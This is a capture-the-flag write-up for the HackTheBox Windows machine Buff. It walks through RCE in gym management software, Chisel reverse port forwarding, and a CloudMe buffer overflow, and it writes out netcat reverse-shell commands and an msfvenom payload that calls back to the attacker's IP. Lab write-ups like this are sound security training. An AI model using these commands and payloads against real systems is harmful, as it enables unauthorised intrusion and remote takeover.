HackTheBox — Buff Writeup
Buff is a Medium level Oscp like Windows machine on Hack The Box.In this we get remote code execution using an exploit and then use Chisel to port forward target’s port to our kali machine and finally exploit the CloudMe service using a buffer overflow exploit.This box may be a bit unstable and you might have to revert it as the BO exploit by other users can crash it.
Enumeration
Pretty simple, port 8080 is hosting a website and is using gym management software 1.0
We google and immediately find a Remote Code Execution exploit for the same.
The usage is pretty simple and we immediately get a shell as user shaun
and we also find the user flag
NOTE: We find that the shell is not very useful as we cannot move around other folders. Lets try to send nc.exe to the target and use it to connect to our kali machine which will be more stable.In order to locate the nc.exe executable on your kali you can use the locate command(locate nc.exe) now all we have to do is start a simple http server in our kali
python -m SimpleHTTPServer 9999
Now back on our target windows we can use curl or wget to download nc.exe. (I tried using certutil however wierdly only curl works in this box)
Finally start a netcat listener on your kali (nc -nlvp 8888) and execute nc.exe on the windows machine
nc.exe <kali-ip> <kali-port> -e powershell
DO NOTE !!! : Unless you use the -e option, it wont work and you wont get a shell.You can also use -e cmd.exe instead.
Once done, you will get a proper shell where you can move around easily.As you can see below :)
Now lets transfer winpeas to our target using curl once again
Some interesting finds are that it has a mysql server listening on local port 3306
Also it has something called CloudMe running on port 8888 internally.
You can also find this manually by running —
netstat -an command
Moreover in shaun’s download folder we find a Cloudme executable
Running the — tasklist /v command shows that cloudme is running on our target.
Using google we immediately find a buffer overflow exploit for CloudMe
https://www.exploit-db.com/exploits/48389
However if we read through the exploit, we find that it uses port 8888
This is also confirmed by a google search
Since we can only access port 8888 locally on our target, we can use Chisel or Plink to port forward target’s port 8888 to our kali’s 8888
so that we can access port 8888 on our kali machine locally.If you want to use plink you can refer this writeup(https://bigb0ss.medium.com/htb-buff-writeup-23617ea8127f)
However Chisel is a more preferred and easy to use tool.
First we have to google chisel binary and download one for linux and one for windows
and unzip both of them using the command gunzip and also give both of them executable permission using chmod +x
Now keep the linux version of chisel in your kali and transfer the windows version to the target as chisel.exe.
PORT FORWARDNG USING CHISEL
On your kali run-
chisel server - -reverse - -port 9001
DO NOTE that you can use any port number.What this command does is basically start a chisel server on our kali on port 9001
NOW, on your target windows run,
.\chisel.exe client <kaliIP>:9001 R:8888:localhost:8888
What it does is forward window’s port 8888 to our kali’s port 8888. The first port after the R: option is that of our kali and the second port is that of windows.And as you remember port 9001 is our chisel server on kali which will remain same.
To check that the port has been forwarded, run- netstat -anlp | grep 8888 on your kali machine and we can see Chisel
BONUS: You can also try connecting to mysql server locally which our kali is accessing on port 3306.If you dig deep into the database, you will find that the username is root and password is blank for our target, howevr i will not cover it here, you can find many writeups which dig into it.I will go with the intended way which is port 8888
IN our buffer overflow exploit we need to change the msfvenom payload.I have used this one:
msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.5 7777 -e powershell' -b '\x00\x0A\x0D' -f python
(DO NOTE: Here as well i had to use -e powershell OR -e cmd.exe else it wont work.)
(There is also an alternative which is -p windows/shell_reverse_tcp which you can find in other writeups)
Once our payload is ready we will paste it.Also in the exploit replace ‘payload’ with ‘buf’ (in line 45 and 47) and you are good to go
Start a netcat listener in your kali’s port 7777 and run the exploit.It might take a few tries but you will get a shell as admin !
Conslusion
Although tricky and unstable, this was a very informative box when in came to using Chisel and Buffer overflows.I hope you learned from my writeup and make sure to follow me here on medium for more such oscp like writeups.
— ZEUS